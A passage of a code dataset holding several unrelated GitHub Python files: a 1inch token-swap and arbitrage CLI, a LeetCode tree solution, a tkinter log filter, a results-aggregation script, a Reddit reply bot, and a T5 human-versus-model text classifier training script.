it's in plain text. \"\n \"Calling this function again will overwrite it.\")\n\n def print_current_pub_address(self):\n if not self.config_check():\n return\n account = w3.eth.account.privateKeyToAccount(privateKey)\n print(account.address)\n\n def print_current_balance(self):\n if not self.config_check():\n return\n account = w3.eth.account.privateKeyToAccount(privateKey)\n print(\"Current Balance: {}\".format(w3.fromWei(w3.eth.getBalance(account.address), 'ether')))\n\n def print_current_token_balance(self, token):\n if not self.config_check():\n return\n try:\n token_contract = w3.eth.contract(address=w3.toChecksumAddress(self.get_token_info(token)[\"address\"]),\n abi=token_abi)\n token_balance = token_contract.functions.balanceOf(self.get_public_key()).call()\n token_balance_normalized = w3.fromWei(int(token_balance), 'ether')\n print(\"Current Balance: {} {}\".format(token_balance_normalized, token))\n except:\n print(\"Token not supported\")\n\n @asyncio.coroutine\n async def fetch(self, from_token, to_token, quantity, blocker, focus):\n request = 'https://api.1inch.exchange/v1.1/quote?fromTokenSymbol={0}&' \\\n 'toTokenSymbol={1}&amount={2}&disabledExchangesList=\\'{3}\\''.format(from_token, to_token, quantity,\n blocker)\n return focus, requests.get(request)\n\n def api_arbitrage_detector(self, from_token, to_token, quantity):\n try:\n tasks = [self.fetch(from_token, to_token, quantity, \"\", \"\")]\n focus, swap_from_result = loop.run_until_complete(asyncio.gather(*tasks))[0]\n if swap_from_result.status_code != 200:\n print(\"Failure getting initial quote\")\n return\n print(str(w3.fromWei(int(swap_from_result.json()['fromTokenAmount']), 'ether')) +\n \" \" + swap_from_result.json()['fromToken']['symbol'] + \" to \" +\n str(w3.fromWei(int(swap_from_result.json()['toTokenAmount']), 'ether')) +\n \" \" + swap_from_result.json()['toToken']['symbol'])\n\n exchanges = requests.get('https://api.1inch.exchange/v1.1/exchanges')\n hide = \"\"\n for exchange in exchanges.json():\n hide += exchange[\"name\"] + \",\"\n block_splits = hide[0:len(hide) - 2].split(\",\")\n\n blockers = []\n\n blocker_1_copy = block_splits.copy()\n blocker_1_copy.remove('Uniswap')\n blockers.append(blocker_1_copy)\n\n blocker_2_copy = block_splits.copy()\n blocker_2_copy.remove('Curve.fi v2')\n blockers.append(blocker_2_copy)\n\n blocker_3_copy = block_splits.copy()\n blocker_3_copy.remove('Curve.fi')\n blockers.append(blocker_3_copy)\n\n blocker_4_copy = block_splits.copy()\n blocker_4_copy.remove('MultiSplit')\n blockers.append(blocker_4_copy)\n\n blocker_5_copy = block_splits.copy()\n blocker_5_copy.remove('Balancer')\n blockers.append(blocker_5_copy)\n\n blocker_6_copy = block_splits.copy()\n blocker_6_copy.remove('Kyber')\n blockers.append(blocker_6_copy)\n\n tasks = []\n for blocker in blockers:\n tasks.append(self.fetch(to_token, from_token,\n int(swap_from_result.json()['toTokenAmount']), \",\".join(blocker),\n self.diff(blocker, block_splits)))\n results = loop.run_until_complete(asyncio.gather(*tasks))\n for result in filter(lambda result: result[1].status_code == 200, results):\n swap_to_json = result[1].json()\n print(str(w3.fromWei(int(swap_to_json['fromTokenAmount']), 'ether')) +\n \" \" + swap_to_json['fromToken']['symbol'] + \" to \" +\n str(w3.fromWei(int(swap_to_json['toTokenAmount']), 'ether')) +\n \" \" + str(swap_to_json['toToken']['symbol']) + \": \" + str(result[0]))\n if int(swap_to_json['toTokenAmount']) > int(swap_from_result.json()['fromTokenAmount']):\n print(\"Arbitrage Detected for: {}\".format(result[0]))\n return\n print(\"No Arbitrage Opportunity Detected\")\n except Exception as e:\n print(e)\n\n def quote(self, from_token, to_token, quantity):\n if not self.config_check():\n return\n one_inch_join = w3.eth.contract(address=one_inch_split_contract, abi=one_inch_split_abi)\n contract_response = one_inch_join.functions.getExpectedReturn(\n w3.toChecksumAddress(self.get_token_info(from_token)[\"address\"]),\n w3.toChecksumAddress(self.get_token_info(to_token)[\"address\"]), quantity, 100, 0).call(\n {'from': self.get_public_key()})\n print(\"Swap Quote: {0}\".format(contract_response))\n return contract_response\n\n def swap(self, from_token, to_token, quantity):\n if not self.config_check():\n return\n account = w3.eth.account.privateKeyToAccount(privateKey)\n quote = self.quote(from_token, to_token, quantity)\n min_return = quote[0]\n distribution = quote[1]\n disable_flags = 0\n one_inch_join = w3.eth.contract(address=one_inch_split_contract, abi=one_inch_split_abi)\n nonce = w3.eth.getTransactionCount(self.get_public_key())\n\n print(\"From Token Info: {}\".format(self.get_token_info(from_token)))\n print(\"To Token Info: {}\".format(self.get_token_info(to_token)))\n\n if from_token.lower() == \"eth\":\n value = quantity\n else:\n value = 0\n\n data = one_inch_join.encodeABI(fn_name=\"swap\", args=[\n w3.toChecksumAddress(self.get_token_info(from_token)[\"address\"]),\n w3.toChecksumAddress(self.get_token_info(to_token)[\"address\"]),\n quantity, min_return, distribution, disable_flags])\n\n tx = {\n 'nonce': nonce,\n 'to': one_inch_split_contract,\n 'value': value,\n 'gasPrice': w3.toWei(40, 'gwei'),\n 'from': self.get_public_key(),\n 'data': data\n }\n\n try:\n gas = w3.eth.estimateGas(tx)\n print(\"Gas Supplied: {}\".format(gas))\n tx[\"gas\"] = gas\n except Exception as e:\n print(e)\n return\n\n print('transaction data: {0}'.format(tx))\n\n try:\n signed_tx = w3.eth.account.signTransaction(tx, account.privateKey)\n except Exception as e:\n print(e)\n return False\n try:\n tx_hash = w3.eth.sendRawTransaction(signed_tx.rawTransaction)\n print(\"TXID: {0}\".format(w3.toHex(tx_hash)))\n except Exception as e:\n print(e)\n return False\n\n def get_allowance(self, token):\n if not self.config_check():\n print(\"Call load first to populate tokens\")\n return\n token_info = self.get_token_info(token)[\"address\"]\n token_address = w3.toChecksumAddress(token_info)\n mcd_contract = w3.eth.contract(address=token_address, abi=mcd_abi)\n allowance = mcd_contract.functions.allowance(self.get_public_key(), one_inch_split_contract).call()\n print(\"Current allowance: {0}\".format(allowance))\n return allowance\n\n def approve_tokens(self, token, amount):\n if not self.config_check():\n return\n token_address = w3.toChecksumAddress(self.get_token_info(token)[\"address\"])\n mcd_contract = w3.eth.contract(address=token_address, abi=mcd_abi)\n self.get_allowance(token)\n base_account = w3.eth.account.privateKeyToAccount(privateKey)\n nonce = w3.eth.getTransactionCount(base_account.address)\n data = mcd_contract.encodeABI(fn_name=\"approve\", args=[one_inch_split_contract, amount])\n tx = {\n 'nonce': nonce,\n 'to': token_address,\n 'value': 0,\n 'gasPrice': w3.toWei(40, 'gwei'),\n 'from': base_account.address,\n 'data': data\n }\n\n try:\n gas = w3.eth.estimateGas(tx)\n print(\"Gas Supplied: {}\".format(gas))\n tx[\"gas\"] = gas\n except Exception as e:\n print(e)\n return\n\n try:\n signed_tx = w3.eth.account.signTransaction(tx, privateKey)\n except Exception as e:\n print(e)\n return\n try:\n tx_hash = w3.eth.sendRawTransaction(signed_tx.rawTransaction)\n print(\"TXID from 1 Inch: {0}\".format(w3.toHex(tx_hash)))\n except Exception as e:\n print(e)\n return\n\n def get_token_info(self, token):\n if not self.config_check():\n return\n for key in self.tokens:\n if key.lower() == token.lower():\n return self.tokens[key]\n\n def get_public_key(self):\n if not self.config_check():\n return\n account = w3.eth.account.privateKeyToAccount(privateKey)\n return w3.toChecksumAddress(account.address)\n\n @staticmethod\n def format_float(num):\n return np.format_float_positional(num, trim='-')\n\n @staticmethod\n def diff(li1, li2):\n li_dif = [i for i in li1 + li2 if i not in li1 or i not in li2]\n return li_dif\n\n def config_check(self):\n private_key_exists = len(privateKey) != 0\n tokens_populated = self.tokens != any\n if not private_key_exists:\n print(\"Generate a new private key\")\n if not tokens_populated:\n print(\"Load tokens please\")\n return private_key_exists and tokens_populated\n\n\nif __name__ == '__main__':\n\n oneInch = OneInch()\n print(\"Web3 Connected: {}\".format(w3.isConnected()))\n # oneInch.load_tokens()\n w3.middleware_onion.add(middleware.time_based_cache_middleware)\n w3.middleware_onion.add(middleware.latest_block_based_cache_middleware)\n w3.middleware_onion.add(middleware.simple_cache_middleware)\n w3.eth.setGasPriceStrategy(fast_gas_price_strategy)\n while True:\n action = input(\"\\nWhat should I do?\\n[LIST]List Tokens\\n[LOAD]Load Tokens\\n[GENERATE] generate new private key\"\n \"\\n[PRINT] print current pub address\\n[APPROVE] approve token for swap (format: approve \"\n \")\\n[QUOTE] request a quote using the 1inch contract (format: quote \"\n \" )\\n[BALANCE] print current Eth balance (format: balance)\"\n \"\\n[TOKENBALANCE] print current token balance (format: tokenbalance )\\n[API] probe 1inch \"\n \"for an arbitrage opportunity (format: api )\"\n \"\\n[ALLOWANCE] check allowance for a specific token (format: allowance )\\n[TOKEN] print \"\n \"token info (format: token )\\n[SWAP] performs an actual swap, if from_token is not Eth, \"\n \"don't forget to approve first (format: swap )\\nType your \"\n \"command here...\").upper()\n if action == 'LIST':\n oneInch.list_tokens()\n elif action == 'LOAD':\n oneInch.load_tokens()\n elif action == \"GENERATE\":\n oneInch.generate_address()\n elif action.startswith(\"TOKENBALANCE\"):\n oneInch.print_current_token_balance(action[12:].strip())\n elif action.startswith(\"TOKEN\"):\n oneInch.token_info(action[5:].strip())\n elif action == \"PRINT\":\n oneInch.print_current_pub_address()\n elif action == \"BALANCE\":\n oneInch.print_current_balance()\n elif action.lower().startswith(\"APPROVE\".lower()):\n splits = action[7:].strip().split()\n if len(splits) < 2:\n print(\"required format \\\"quote {fromToken} {toToken} {quantity}\\\"\")\n else:\n oneInch.approve_tokens(splits[0], w3.toWei(float(splits[1]), 'ether'))\n elif action.lower().startswith(\"API\".lower()):\n splits = action[3:].strip().split()\n if len(splits) < 3:\n print(\"required format \\\"quote {fromToken} {toToken} {quantity}\\\"\")\n else:\n oneInch.api_arbitrage_detector(splits[0], splits[1], w3.toWei(float(splits[2]), 'ether'))\n elif action.lower().startswith(\"QUOTE\".lower()):\n splits = action[5:].strip().split()\n if len(splits) < 3:\n print(\"required format \\\"quote {fromToken} {toToken} {quantity}\\\"\")\n else:\n oneInch.quote(splits[0], splits[1], w3.toWei(float(splits[2]), 'ether'))\n elif action.lower().startswith(\"SWAP\".lower()):\n splits = action[4:].strip().split()\n if len(splits) < 3:\n print(\"required format \\\"quote {fromToken} {toToken} {quantity}\\\"\")\n else:\n oneInch.swap(splits[0], splits[1], w3.toWei(float(splits[2]), 'ether'))\n elif action.lower().startswith(\"ALLOWANCE\".lower()):\n oneInch.get_allowance(action[9:].strip())\n else:\n print(\"Operation Not Defined\")\n","repo_name":"nseidm1/1inchpython","sub_path":"OneInch.py","file_name":"OneInch.py","file_ext":"py","file_size_in_byte":15701,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"71335806440","text":"# Path Sum III\n# Tree\n\n# https://blog.csdn.net/fuxuemingzhu/article/details/71097135\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n# DFS + DFS\n# runtime: faster than 32.80% \nclass Solution1:\n def pathSum(self, root: TreeNode, sum: int) -> int:\n if not root:\n return 0\n return self.dfs(root, sum) + self.pathSum(root.left, sum) + self.pathSum(root.right, sum)\n \n \n def dfs(self, root, sum):\n res = 0\n if not root:\n return res\n \n sum -= root.val\n if sum == 0:\n res += 1\n res += self.dfs(root.left, sum)\n res += self.dfs(root.right, sum)\n \n return res\n\n\n# DFS + BFS\n# runtime: faster than 30.11%\n# res 使用数组:因为如果直接设置成0的话,为传值方式,在函数传参的时候是拷贝到函数里面的,在函数内部修改不会影响到函数外边的该变量的。设置成数组形式的话,是以传引用的方式传到函数的里面,函数内部修改会影响到函数外边的数组内容。\nclass Solution2:\n def pathSum(self, root: TreeNode, sum: int) -> int:\n res = [0]\n que = collections.deque()\n que.append(root)\n while que:\n node = que.popleft()\n if not node:\n continue\n self.dfs(node, res, 0, sum)\n que.append(node.left)\n que.append(node.right)\n return res[0]\n \n \n def dfs(self, root, res, path, target):\n if not root:\n return\n path += root.val\n if path == target:\n res[0] += 1\n self.dfs(root.left, res, path, target)\n self.dfs(root.right, res, path, target)\n","repo_name":"junyang10734/leetcode-python","sub_path":"437.py","file_name":"437.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"930799527","text":"'''\r\n Copyright 2020 Micheal Wilson - mail4mikew@gmail.com\r\n\r\n This software is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n It is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see .\r\n'''\r\n\r\nimport tkinter as tk\r\nfrom tkinter import filedialog as fd \r\nfrom tkinter import ttk\r\nimport re\r\n\r\nimport string\r\nfrom config import filter_options, marker_options\r\nfrom widgets import MarkTextBox, TextLineNumbers\r\n\r\nprintable = set(string.printable)\r\n\r\nclass Application(tk.Frame):\r\n def __init__(self, master=None):\r\n super().__init__(master)\r\n self.master = master\r\n self.Filter_Re = tk.StringVar()\r\n self.Mark_Re = tk.StringVar()\r\n self.available_filters = filter_options\r\n self.available_markers = marker_options\r\n self.pack()\r\n self.create_widgets()\r\n self.file_contents = []\r\n self.line_map = [] # for each filtered line displayed, the original line # \r\n \r\n def LoadFileWithFilter(self):\r\n try:\r\n total_lines = len(self.file_contents)\r\n first, last = [val*total_lines for val in self.textbox.yview()]\r\n if last < 1: \r\n first_to_show = 1\r\n else: \r\n first_to_show = self.line_map[int(first)] # line number to align display to after it is loaded\r\n print(\"first to show {}\".format(first_to_show))\r\n \r\n self.file_contents = []\r\n self.line_map = [] \r\n element = str( self.Filter_Re.get())\r\n marking = str(self.Mark_Re.get())\r\n print(\"Element selected '{}'\".format(element))\r\n lineNum = 1\r\n locateLineNum = 1\r\n with open(self.filename, \"r\") as input_file:\r\n lines = input_file.readlines()\r\n \r\n for line in lines: \r\n line = re.sub(r'[^\\x09-\\x7f]',r'.', line)\r\n lineNumStr = (\" {}\".format(lineNum))[-5:]\r\n keep = re.search(element, line)\r\n if keep:\r\n if self.HaveLineNums.get() == \"on\":\r\n line = \" \".join([lineNumStr, line])\r\n self.file_contents.append(line)\r\n self.line_map.append(lineNum)\r\n self.textbox.AddLineNumTag(locateLineNum,0,locateLineNum,5)\r\n else:\r\n self.file_contents.append(line)\r\n self.line_map.append(lineNum)\r\n \r\n for will_mark in re.finditer(marking, line):\r\n print(locateLineNum,will_mark.start(),locateLineNum,will_mark.end())\r\n self.textbox.AddMarkTag(locateLineNum,will_mark.start(),locateLineNum,will_mark.end()) \r\n \r\n locateLineNum += 1\r\n lineNum += 1\r\n \r\n self.textbox.LoadData(self.file_contents)\r\n \r\n for i,lineNum in enumerate(self.line_map):\r\n if lineNum >= first_to_show:\r\n first = float(i)/float(len(self.line_map))\r\n print(\"Restore show {} ({} of {} lines\".format(first, i, len(self.line_map)))\r\n # self.textbox.see(\"{}.{}\".format(i,0))\r\n self.textbox.yview_moveto(first)\r\n break\r\n \r\n except AttributeError:\r\n pass\r\n\r\n \"\"\"\r\n from ScrolledText import ScrolledText\r\n s=ScrolledText()\r\n s.pack(fill='both', expand=1)\r\n s.insert('end', some_text)\r\n first, last = s.yview()\r\n s.delete(1.0, 'end')\r\n s.insert('end', some_text)\r\n s.yview_moveto(first)\r\n \"\"\"\r\n\r\n def GetFileName(self):\r\n self.filename= fd.askopenfilename(filetypes=((\"Logs\", \".log\"), (\"All files\",\"*.*\"))) \r\n print(self.filename)\r\n self.master.title(self.filename) # change the title of the app to a label of this filename\r\n self.LoadFileWithFilter() \r\n \r\n def on_filter_combo_select(self, event):\r\n (event)\r\n element = self.Filter_Re.get()\r\n print(\"Element selected '{}'\".format(element))\r\n self.LoadFileWithFilter()\r\n\r\n def on_marker_combo_select(self, event):\r\n (event)\r\n element = self.Mark_Re.get()\r\n print(\"Marker selected '{}'\".format(element))\r\n self.LoadFileWithFilter()\r\n\r\n def OnHaveLineNumsChanged(self):\r\n print(self.HaveLineNums.get())\r\n self.LoadFileWithFilter()\r\n\r\n def on_keypress_filters(self, event):\r\n if event.char == '\\r':\r\n self.on_apply_filters()\r\n\r\n def on_keypress_markers(self, event):\r\n if event.char == '\\r':\r\n self.on_apply_markers()\r\n\r\n def on_apply_filters(self):\r\n element = self.Filter_Re.get()\r\n print(\"Element selected '{}'\".format(element))\r\n self.available_filters.append(element)\r\n self.available_filters = list(set(self.available_filters)) # remove copies\r\n self.filter_re['values'] = self.available_filters\r\n self.LoadFileWithFilter()\r\n\r\n def on_apply_markers(self):\r\n element = self.Mark_Re.get()\r\n print(\"Element selected '{}'\".format(element))\r\n self.available_markers.append(element)\r\n self.available_markers = list(set(self.available_markers)) # remove copies\r\n self.marker_re['values'] = self.available_markers\r\n self.LoadFileWithFilter()\r\n \r\n def _on_change(self, event):\r\n self.linenumbers.redraw()\r\n \r\n def create_textbox_frame(self):\r\n self.textbox_frame = tk.Frame(self.master) \r\n\r\n # textbox with a scroll bar \r\n self.textbox = MarkTextBox(self.textbox_frame)\r\n \r\n self.scroll = tk.Scrollbar(self.textbox_frame, command = self.textbox.yview)\r\n self.textbox.configure(yscrollcommand=self.scroll.set)\r\n \r\n self.linenumbers = TextLineNumbers(self.textbox_frame, width=40)\r\n self.linenumbers.attach(self.textbox)\r\n\r\n # place the scrollbar next to the text box\r\n self.scroll.pack(side=tk.RIGHT, fill=tk.Y)\r\n self.linenumbers.pack(side=\"left\", fill=\"y\")\r\n self.textbox.pack(side=\"right\", fill=\"both\", expand=True)\r\n # self.textbox.pack(side=tk.LEFT, expand = tk.YES, fill=tk.BOTH) \r\n self.textbox.bind(\"<>\", self._on_change)\r\n self.textbox.bind(\"\", self._on_change)\r\n\r\n def create_widgets(self):\r\n\r\n self.create_textbox_frame()\r\n self.textbox_frame.pack(side=tk.BOTTOM, expand = tk.YES, fill=tk.BOTH)\r\n\r\n # options frame goes on the top & contains a number of widgets\r\n self.options_frame = tk.Frame(self.master, borderwidth=5)\r\n self.options_frame.pack(side=tk.LEFT)\r\n\r\n # ROW 0\r\n\r\n # file dialog button\r\n self.file_select = tk.Button(self.options_frame, text='File Open', command=self.GetFileName)\r\n self.file_select.grid(row=0, column=0)\r\n\r\n # label\r\n tk.Label(self.options_frame, text=\"Filter Lines (RegEx)\", padx = 5, pady = 5).grid(row=0, column=1)\r\n \r\n # combo box\r\n self.filter_re = ttk.Combobox(self.options_frame, values=self.available_filters, textvariable = self.Filter_Re)\r\n self.filter_re.grid(row=0, column=2)\r\n self.filter_re.current(0)\r\n self.filter_re[\"width\"] = 60\r\n self.filter_re.bind(\"<>\", self.on_filter_combo_select)\r\n self.filter_re.bind(\"\", self.on_keypress_filters)\r\n\r\n # Apply filters button\r\n self.apply = tk.Button(self.options_frame)\r\n self.apply[\"text\"] = \"Apply\"\r\n self.apply[\"command\"] = self.on_apply_filters\r\n self.apply.grid(row=0, column=3)\r\n \r\n # ROW 1\r\n\r\n # Linenum checkbox\r\n self.HaveLineNums = tk.StringVar()\r\n self.HaveLineNums.set(\"on\")\r\n self.LineNumCheck = ttk.Checkbutton(self.options_frame,\r\n variable = self.HaveLineNums, \r\n text='Line #s',\r\n command=self.OnHaveLineNumsChanged, onvalue='on', offvalue='off')\r\n self.LineNumCheck.grid(row=1, column=0)\r\n\r\n # label\r\n tk.Label(self.options_frame, text=\"Mark Text (RegEx)\").grid(row=1, column=1)\r\n \r\n # combo box\r\n self.marker_re = ttk.Combobox(self.options_frame, values=self.available_markers, textvariable = self.Mark_Re)\r\n self.marker_re.grid(row=1, column=2)\r\n self.marker_re.current(0)\r\n self.marker_re[\"width\"] = 60\r\n self.marker_re.bind(\"<>\", self.on_marker_combo_select)\r\n self.marker_re.bind(\"\", self.on_keypress_markers)\r\n \r\n # Apply markers button\r\n self.apply = tk.Button(self.options_frame)\r\n self.apply[\"text\"] = \"Apply\"\r\n self.apply[\"command\"] = self.on_apply_markers\r\n self.apply.grid(row=1, column=3)\r\n\r\n \r\n\r\nroot = tk.Tk()\r\napp = Application(master=root)\r\napp.mainloop()","repo_name":"mj8w/LogFilter","sub_path":"src/Filter.py","file_name":"Filter.py","file_ext":"py","file_size_in_byte":9726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"16189235344","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 7 10:06:33 2019\n\n@author: jplineb\n\"\"\"\n\nimport os\nimport pandas as pd\nimport numpy as np\n\ndf = pd.read_csv('DF_resnet18_epoch9.csv')\n\ndef fixtrans(row):\n test_name = row['test_name']\n transforms = test_name.split('_')[2]\n return transforms\n\ndef fixnorm(row):\n test_name = row['test_name']\n norm = test_name.split('_')[3]\n return norm\n\ndf['transforms'] = df.apply(fixtrans, axis = 1)\ndf['normalized'] = df.apply(fixnorm, axis = 1)\n#df = df.drop(columns = ['split_nummax_error'])\ndf_mean = df.groupby('test_name').mean()\ndf_agg = df.groupby(['test_name']).agg([np.average, lambda x: np.std(x)/np.sqrt(5)])\ndf_agg_clean = pd.DataFrame(df, columns=['test_name', 'min_error'])\ndf_agg_clean = df_agg_clean.groupby(['test_name']).agg([np.average, lambda x: np.std(x)/np.sqrt(5)])\n\ndef findmaxmean(row):\n mean_error = row['min_error']['average']\n error_bar = row['min_error']['']\n return (mean_error+(2*error_bar))\n\ndf_agg_clean['max_mean_error'] = df_agg_clean.apply(findmaxmean, axis =1)\n\n# Use for writing results to Excel\n#with pd.ExcelWriter('Test_suite_results_favs.xlsx') as writer:\n# df.to_excel(writer, sheet_name='All_Results')\n# df_mean.to_excel(writer, sheet_name='Means_grouped')\n# df_agg.to_excel(writer, sheet_name='Agg')","repo_name":"jplineb/Watson_ChickenProj_JP","sub_path":"Egg_ML/fastai/result_analysis/testing_suite_inference.py","file_name":"testing_suite_inference.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42588637099","text":"import random\nimport praw\nfrom praw.models import MoreComments\nfrom praw.exceptions import APIException\n\nkeywords = ['verstappen', 'hamilton', 'max', 'lewis', 'kimi']\n\nreddit = praw.Reddit(\n user_agent='kimi-bot',\n client_id='',\n client_secret='',\n username='',\n password='',\n ratelimit_seconds=300,\n)\n\nsubreddits = reddit.subreddit('aarava+tiametmarduk') \n\nfor comment in subreddits.stream.comments(skip_existing=True):\n if isinstance(comment, MoreComments):\n continue\n\n text = comment.body.lower()\n\n if comment.author.name == 'kimi-bot':\n continue\n else:\n for keyword in keywords:\n if (keyword in text):\n try:\n print(\"\\n\" + comment.author.name + \": \" + comment.body)\n print('I\\'ve just commented: BWOAH')\n comment.reply('BWOAH')\n except APIException as e:\n print(\"Oopsie\\n\\n\" + e.message)\n","repo_name":"R0dn3yS/dankbot","sub_path":"kimi.py","file_name":"kimi.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14062039833","text":"import sys\n# sys.path.append(\"../\")\nfrom transformers import (\n DataCollatorForSeq2Seq, AutoTokenizer, AutoModelForSeq2SeqLM, T5ForConditionalGeneration,\n Seq2SeqTrainingArguments, Trainer, Seq2SeqTrainer,AutoConfig\n)\nfrom datasets import load_dataset\nfrom torch.utils.data import DataLoader,Dataset\nimport torch\nfrom sklearn.metrics import accuracy_score,classification_report\nfrom tqdm import tqdm\nimport argparse\nfrom utils import create_optimizer\nfrom transformers.trainer_utils import SchedulerType\nimport math\nfrom transformers.optimization import get_scheduler\nimport os\nfrom torch.utils.tensorboard import SummaryWriter\nimport logging\nfrom transformers import set_seed\nfrom instruction import InstructionsHandler_Chinese,InstructionsHandler_English\n# from utils import OursGenerator\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\nclass trainCollator():\n def __init__(self,max_seq_length,tokenizer,language):\n self.max_seq_length = max_seq_length\n self.tokenizer = tokenizer\n self.map = {\"0\":\"human\",\"1\":\"model\"}\n self.seq2seq_collator = DataCollatorForSeq2Seq(self.tokenizer)\n if language==\"en\":\n self.instructhandler = InstructionsHandler_English()\n elif language==\"zh\":\n self.instructhandler = InstructionsHandler_Chinese()\n else:\n raise ValueError(\"LANGUAGE ERROR\")\n\n def __call__(self, examples):\n t_examples = [ example[\"text\"] for example in examples ]\n labels = [ example[\"label\"] for example in examples ]\n text = []\n for example in t_examples:\n instruct = self.instructhandler.load_instruction_set()\n t=instruct['input_instruct']+example+instruct['eos_instruct']\n text.append(t)\n text_labels = []\n for label in labels:\n text_labels.append(self.map[str(label)])\n\n all_data = []\n for i in range(len(text)):\n row_text,row_label = text[i],text_labels[i]\n proc_data = self.tokenizer(\n row_text,\n truncation=True,\n max_length=self.max_seq_length,\n # return_tensors=\"pt\"\n )\n proc_label = self.tokenizer(\n row_label,\n truncation=True,\n max_length=self.max_seq_length,\n # return_tensors=\"pt\"\n )\n proc_data[\"labels\"] = proc_label[\"input_ids\"]\n all_data.append(proc_data)\n all_data = self.seq2seq_collator(all_data)\n return all_data\n\nclass evalCollator():\n def __init__(self,max_seq_length,tokenizer,language):\n self.max_seq_length = max_seq_length\n self.tokenizer = tokenizer\n self.seq2seq_collator = DataCollatorForSeq2Seq(self.tokenizer)\n if language==\"en\":\n self.instructhandler = InstructionsHandler_English()\n elif language==\"zh\":\n self.instructhandler = InstructionsHandler_Chinese()\n else:\n raise ValueError(\"LANGUAGE ERROR\")\n\n def __call__(self, examples):\n\n t_examples = [ example[\"text\"] for example in examples ]\n text = []\n for example in t_examples:\n instruct = self.instructhandler.load_instruction_set()\n t=instruct['input_instruct']+example+instruct['eos_instruct']\n text.append(t)\n labels =[ example[\"label\"] for example in examples ]\n\n proc_data = self.tokenizer(\n text,\n truncation=True,\n max_length=self.max_seq_length,\n padding=\"longest\",\n return_tensors=\"pt\"\n )\n proc_data[\"labels\"] = labels\n return proc_data\n\n@torch.no_grad()\ndef test(test_loader,model,tokenizer,device):\n model.eval()\n y_true,y_pred=[],[]\n for batch in tqdm(test_loader):\n input_ids,labels = batch[\"input_ids\"].to(device),batch[\"labels\"]\n output = model.generate(input_ids)\n output_texts = tokenizer.batch_decode(output, skip_special_tokens=True)\n # predict = [ for output_text in output_texts ]\n for output_text in output_texts:\n if output_text.lower() == \"human\":\n predict = 0\n elif output_text.lower() == \"model\":\n predict = 1\n else:\n predict = 2\n y_pred.append(predict)\n y_true.extend(labels)\n acc = accuracy_score(y_true=y_true, y_pred=y_pred)\n model.train()\n return acc\n\ndef main(args):\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n # config = AutoConfig.from_pretrained(args.model)\n tokenizer = AutoTokenizer.from_pretrained(args.model)\n model = AutoModelForSeq2SeqLM.from_pretrained(args.model)\n model.to(device)\n set_seed(args.seed)\n train_collator=trainCollator(max_seq_length=args.max_length, tokenizer=tokenizer,language=args.lang)\n eval_collator=evalCollator(max_seq_length=args.max_length, tokenizer=tokenizer,language=args.lang)\n dataset = load_dataset(\"json\",data_files=args.train_path)\n train_loader = DataLoader(\n dataset[\"train\"],\n batch_size=args.batch_size,\n collate_fn=train_collator,\n shuffle=True,\n drop_last=False,\n num_workers=10,\n pin_memory=True,\n )\n ours_dataset = load_dataset(\"json\",data_files={\"validation\":args.ours_val_path})\n ours_val_loader = DataLoader(\n ours_dataset[\"validation\"],\n batch_size=args.batch_size,\n collate_fn=eval_collator,\n shuffle=True,\n drop_last=False,\n num_workers=10,\n pin_memory=True,\n )\n hc3_dataset = load_dataset(\"json\",data_files={\"validation\":args.hc3_val_path})\n hc3_val_loader = DataLoader(\n hc3_dataset[\"validation\"],\n batch_size=args.batch_size,\n collate_fn=eval_collator,\n shuffle=True,\n drop_last=False,\n num_workers=10,\n pin_memory=True,\n )\n optimizer = create_optimizer(args,model)\n os.makedirs(args.tensorboard_dir,exist_ok=True)\n os.makedirs(args.save_path,exist_ok=True)\n writer = SummaryWriter(args.tensorboard_dir)\n\n effect_batch = args.batch_size * args.accumulation_steps\n num_training_steps_per_epoch = math.ceil(len(train_loader.dataset) // effect_batch)\n num_training_steps = num_training_steps_per_epoch * args.epochs\n num_warmup_steps = num_training_steps * args.warm_up_ratio\n test_steps = num_training_steps // args.num_test_times\n scheduler = get_scheduler(\n SchedulerType.LINEAR,\n # SchedulerType.CONSTANT,\n optimizer,\n num_warmup_steps=num_warmup_steps,\n num_training_steps=num_training_steps,\n )\n\n global_step = 0\n best_ours_acc = -1\n best_hc3_acc = -1\n accumulation_steps = args.accumulation_steps\n for epoch in range(args.epochs):\n model.train()\n for model_inputs in tqdm(train_loader):\n if global_step%accumulation_steps==0:\n scheduler.step()\n \n for k in model_inputs:\n model_inputs[k]=model_inputs[k].to(device)\n output = model(**model_inputs)\n loss = output.loss\n \n acc_loss = loss/accumulation_steps\n acc_loss.backward()\n if((global_step+1)%accumulation_steps)==0:\n optimizer.step()\n optimizer.zero_grad() \n\n writer.add_scalar('loss', loss.item(), global_step)\n writer.add_scalar('lr', scheduler.get_last_lr()[0], global_step)\n \n if (global_step+1) % test_steps==0:\n # if global_step % 1==0:\n ours_val_acc = test(ours_val_loader,model,tokenizer,device)\n hc3_val_acc = test(hc3_val_loader,model,tokenizer,device)\n writer.add_scalar('ours_val_acc', ours_val_acc, global_step)\n writer.add_scalar('hc3_val_acc', hc3_val_acc, global_step)\n logger.info(f\"ours acc:{ours_val_acc}\")\n logger.info(f\"hc3 acc:{hc3_val_acc}\")\n\n if ours_val_acc >= best_ours_acc:\n best_ours_acc = ours_val_acc\n save_path = args.save_path + os.sep + \"ours\"\n 